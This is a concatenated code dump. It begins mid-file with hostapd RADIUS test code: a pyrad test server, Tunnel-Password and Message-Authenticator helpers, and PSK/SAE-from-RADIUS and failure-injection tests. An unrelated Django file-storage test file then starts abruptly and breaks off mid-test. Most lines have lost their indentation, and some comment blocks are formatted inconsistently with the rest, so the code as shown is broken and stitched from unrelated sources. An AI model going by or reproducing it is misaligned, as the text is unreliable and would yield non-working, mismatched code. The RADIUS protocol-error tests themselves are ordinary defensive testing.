reply.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
if self.t_events['double_msg_auth'].is_set():
logger.info("Include two Message-Authenticator attributes")
else:
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
for fd in self.authfds + self.acctfds:
fd.close()
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['msg_auth'] = threading.Event()
t_events['wrong_secret'] = threading.Event()
t_events['double_msg_auth'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
params = hostapd.wpa2_eap_params(ssid="radius-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-test", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['msg_auth'].set()
t_events['wrong_secret'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['wrong_secret'].clear()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['double_msg_auth'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def build_tunnel_password(secret, authenticator, psk):
a = b"\xab\xcd"
psk = psk.encode()
padlen = 16 - (1 + len(psk)) % 16
if padlen == 16:
padlen = 0
p = struct.pack('B', len(psk)) + psk + padlen * b'\x00'
cc_all = bytes()
b = hashlib.md5(secret + authenticator + a).digest()
while len(p) > 0:
pp = bytearray(p[0:16])
p = p[16:]
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
cc_all += cc
b = hashlib.md5(secret + cc).digest()
data = b'\x00' + a + bytes(cc_all)
return data
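# For reference, a rough sketch of the reverse (decryption) operation for the
# RFC 2868 Tunnel-Password layout produced above. This helper is illustrative
# only and is not used by the tests in this file.
def decode_tunnel_password(secret, authenticator, data):
    # data layout: Tag (1 octet) + Salt (2 octets) + ciphertext (16-octet blocks)
    salt = data[1:3]
    ct = data[3:]
    plain = bytearray()
    b = hashlib.md5(secret + authenticator + salt).digest()
    while len(ct) > 0:
        cc = bytearray(ct[0:16])
        ct = ct[16:]
        bb = bytearray(b)
        plain += bytearray(cc[i] ^ bb[i] for i in range(len(cc)))
        b = hashlib.md5(secret + bytes(cc)).digest()
    # The first recovered octet is the password length; the rest is the
    # password followed by zero padding.
    return bytes(plain[1:1 + plain[0]])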
def start_radius_psk_server(psk, invalid_code=False, acct_interim_interval=0,
session_timeout=0, reject=False):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['invalid_code']:
reply.code = pyrad.packet.AccessRequest
if self.t_events['reject']:
reply.code = pyrad.packet.AccessReject
data = build_tunnel_password(reply.secret, pkt.authenticator,
self.t_events['psk'])
reply.AddAttribute("Tunnel-Password", data)
if self.t_events['acct_interim_interval']:
reply.AddAttribute("Acct-Interim-Interval",
self.t_events['acct_interim_interval'])
if self.t_events['session_timeout']:
reply.AddAttribute("Session-Timeout",
self.t_events['session_timeout'])
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
for fd in self.authfds + self.acctfds:
fd.close()
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['psk'] = psk
t_events['invalid_code'] = invalid_code
t_events['acct_interim_interval'] = acct_interim_interval
t_events['session_timeout'] = session_timeout
t_events['reject'] = reject
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
return t, t_events
def hostapd_radius_psk_test_params():
params = hostapd.radius_params()
params['ssid'] = "test-wpa2-psk"
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
return params
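# Note on the parameters above: macaddr_acl=2 tells hostapd to consult the
# RADIUS server for each connecting station, and wpa_psk_radius=2 requires the
# per-station passphrase/PSK to be delivered by the RADIUS server (via the
# Tunnel-Password attribute added by the test server above). Some tests below
# use wpa_psk_radius=3 instead, which defers the RADIUS lookup until the 4-way
# handshake.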
def test_radius_psk(dev, apdev):
"""WPA2 with PSK from RADIUS"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa2-psk", psk="0123456789abcdef",
scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_during_4way_hs(dev, apdev):
"""WPA2 with PSK from RADIUS during 4-way handshake"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
params['macaddr_acl'] = '0'
params['wpa_psk_radius'] = '3'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa2-psk", psk="0123456789abcdef",
scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid(dev, apdev):
"""WPA2 with invalid PSK from RADIUS"""
t, t_events = start_radius_psk_server("1234567")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid2(dev, apdev):
"""WPA2 with invalid PSK (hexstring) from RADIUS"""
t, t_events = start_radius_psk_server(64*'q')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_hex_psk(dev, apdev):
"""WPA2 with PSK hexstring from RADIUS"""
t, t_events = start_radius_psk_server(64*'2', acct_interim_interval=19,
session_timeout=123)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", raw_psk=64*'2', scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_unknown_code(dev, apdev):
"""WPA2 with PSK from RADIUS and unknown code"""
t, t_events = start_radius_psk_server(64*'2', invalid_code=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_reject(dev, apdev):
"""WPA2 with PSK from RADIUS and reject"""
t, t_events = start_radius_psk_server("12345678", reject=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_reject_during_4way_hs(dev, apdev):
"""WPA2 with PSK from RADIUS and reject"""
t, t_events = start_radius_psk_server("12345678", reject=True)
try:
params = hostapd_radius_psk_test_params()
params['macaddr_acl'] = '0'
params['wpa_psk_radius'] = '3'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
dev[0].wait_disconnected()
dev[0].request("DISCONNECT")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_oom(dev, apdev):
"""WPA2 with PSK from RADIUS and OOM"""
t, t_events = start_radius_psk_server(64*'2')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "=hostapd_acl_recv_radius"):
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
finally:
t_events['stop'].set()
t.join()
def test_radius_sae_password(dev, apdev):
"""WPA3 with SAE password from RADIUS"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
params['ssid'] = "test-wpa3-sae"
params["wpa_key_mgmt"] = "SAE"
params['ieee80211w'] = '2'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa3-sae", sae_password="12345678", key_mgmt="SAE",
ieee80211w="2", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa3-sae", sae_password="0123456789abcdef",
key_mgmt="SAE", ieee80211w="2", scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_default(dev, apdev):
"""WPA2 with default PSK"""
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '1'
params['wpa_passphrase'] = 'qwertyuiop'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
hapd.disable()
hapd.set("wpa_psk_radius", "2")
hapd.enable()
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
def test_radius_auth_force_client_addr(dev, apdev):
"""RADIUS client address specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_addr'] = "127.0.0.1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
def test_radius_auth_force_client_dev(dev, apdev):
"""RADIUS client device specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_dev'] = "lo"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
@remote_compatible
def test_radius_auth_force_invalid_client_addr(dev, apdev):
"""RADIUS client address specified and invalid address"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
#params['radius_client_addr'] = "10.11.12.14"
params['radius_client_addr'] = "1::2"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected connection")
def add_message_auth(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(req.authenticator)
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
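# The HMAC-MD5 above is computed over the RADIUS header (code, identifier,
# length and the 16-octet request authenticator) followed by all encoded
# attributes, with the Message-Authenticator attribute itself set to 16 zero
# octets, as specified by RFC 2869. flen = 4 + 16 + len(attrs) is the packet
# length: 4 octets of code/identifier/length, plus the authenticator, plus the
# attributes. Attribute type 80 (deleted and re-added above) is
# Message-Authenticator.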
def test_radius_server_failures(dev, apdev):
"""RADIUS server failure cases"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
dict = pyrad.dictionary.Dictionary("dictionary.radius")
client = pyrad.client.Client(server="127.0.0.1", authport=1812,
secret=b"radius", dict=dict)
client.retries = 1
client.timeout = 1
# unexpected State
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
req['State'] = b'foo-state'
add_message_auth(req)
reply = client.SendPacket(req)
if reply.code != pyrad.packet.AccessReject:
raise Exception("Unexpected RADIUS response code " + str(reply.code))
# no EAP-Message
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
add_message_auth(req)
try:
reply = client.SendPacket(req)
raise Exception("Unexpected response")
except pyrad.client.Timeout:
pass
def test_ap_vlan_wpa2_psk_radius_required(dev, apdev):
"""AP VLAN with WPA2-PSK and RADIUS attributes required"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
secret = reply.secret
if self.t_events['extra'].is_set():
reply.AddAttribute("Chargeable-User-Identity", "test-cui")
reply.AddAttribute("User-Name", "test-user")
if self.t_events['long'].is_set():
reply.AddAttribute("Tunnel-Type", 13)
reply.AddAttribute("Tunnel-Medium-Type", 6)
reply.AddAttribute("Tunnel-Private-Group-ID", "1")
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
for fd in self.authfds + self.acctfds:
fd.close()
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t_events['extra'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['dynamic_vlan'] = "2"
params['wpa_passphrase'] = '0123456789abcdefghi'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
logger.info("connecting without VLAN")
dev[0].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters")
logger.info("connecting without VLAN failed as expected")
logger.info("connecting without VLAN (CUI/User-Name)")
t_events['extra'].set()
dev[1].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[1].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters(2)")
logger.info("connecting without VLAN failed as expected(2)")
t_events['extra'].clear()
t_events['long'].set()
logger.info("connecting with VLAN")
dev[2].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-SSID-TEMP-DISABLED" in ev:
raise Exception("Unexpected failure with vlan parameters")
logger.info("connecting with VLAN succeeded as expected")
finally:
t_events['stop'].set()
t.join()
def test_radius_mppe_failure(dev, apdev):
"""RADIUS failure when adding MPPE keys"""
params = {"ssid": "as", "beacon_int": "2000",
"radius_server_clients": "auth_serv/radius_clients.conf",
"radius_server_auth_port": '18127',
"eap_server": "1",
"eap_user_file": "auth_serv/eap_user.conf",
"ca_cert": "auth_serv/ca.pem",
"server_cert": "auth_serv/server.pem",
"private_key": "auth_serv/server.key"}
authsrv = hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['auth_server_port'] = "18127"
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(authsrv, 1, "os_get_random;radius_msg_add_mppe_keys"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", eap="TTLS",
identity="user", anonymous_identity="ttls",
password="password",
ca_cert="auth_serv/ca.pem", phase2="autheap=GTC",
wait_connect=False, scan_freq="2412")
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
def test_radius_acct_failure(dev, apdev):
"""RADIUS Accounting and failure to add attributes"""
# Connection goes through, but Accounting-Request cannot be sent out due to
# NAS-Identifier being too long to fit into a RADIUS attribute.
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'nas_identifier': 255*'A'}
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
def test_radius_acct_failure_oom(dev, apdev):
"""RADIUS Accounting and failure to add attributes due to OOM"""
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'radius_acct_interim_interval': "1",
'nas_identifier': 250*'A',
'radius_acct_req_attr': ["126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E']}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
dev[1].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].request("REMOVE_NETWORK all")
dev[1].wait_disconnected()
tests = [(1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"),
(2, "radius_msg_add_attr;accounting_msg"),
(3, "radius_msg_add_attr;accounting_msg")]
for count, func in tests:
with fail_test(hapd, count, func):
dev[0].connect("radius-acct-open", key_mgmt="NONE",
scan_freq="2412")
wait_fail_trigger(hapd, "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
with fail_test(hapd, 8,
"radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
wait_fail_trigger(hapd, "GET_FAIL")
with fail_test(hapd, 1, "radius_msg_add_attr;=accounting_report_state"):
hapd.disable()
def test_radius_acct_failure_oom_rsn(dev, apdev):
"""RADIUS Accounting in RSN and failure to add attributes due to OOM"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
params['nas_identifier'] = 250*'A'
params['radius_acct_req_attr'] = ["126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E']
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
connect(dev[0], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
connect(dev[1], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[2].scan_for_bss(bssid, freq="2412")
connect(dev[2], "radius-acct")
for i in range(1, 8):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
for i in range(1, 15):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
def test_radius_acct_failure_sta_data(dev, apdev):
"""RADIUS Accounting and failure to get STA data"""
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius"}
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(hapd, 1, "accounting_sta_update_stats"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=1)
tests.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import time
import zlib
from datetime import datetime, timedelta
from io import BytesIO
try:
import threading
except ImportError:
import dummy_threading as threading
from django.conf import settings
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.core.files.base import File, ContentFile
from django.core.files.images import get_image_dimensions
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import UploadedFile
from django.test import LiveServerTestCase, SimpleTestCase
from django.test.utils import override_settings
from django.utils import six
from django.utils import unittest
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
try:
from django.utils.image import Image
except ImproperlyConfigured:
Image = None
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import doesn't exist.
"""
with six.assertRaisesRegex(self, ImproperlyConfigured,
"Error importing module storage: \"No module named '?storage'?\""):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class doesn't exist.
"""
self.assertRaisesMessage(
ImproperlyConfigured,
'Module "django.core.files.storage" does not define a '
'"NonExistingStorage" attribute/class',
get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module doesn't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImproperlyConfigured,
"Error importing module django.core.files.non_existing_storage: "
"\"No module named '?(django.core.files.)?non_existing_storage'?\""):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
An empty location defaults to the current working directory
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
# should encode special chars except ~!*()'
# like the encodeURIComponent() JavaScript function does
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
f = self.storage.save('storage_test_1', ContentFile('custom content'))
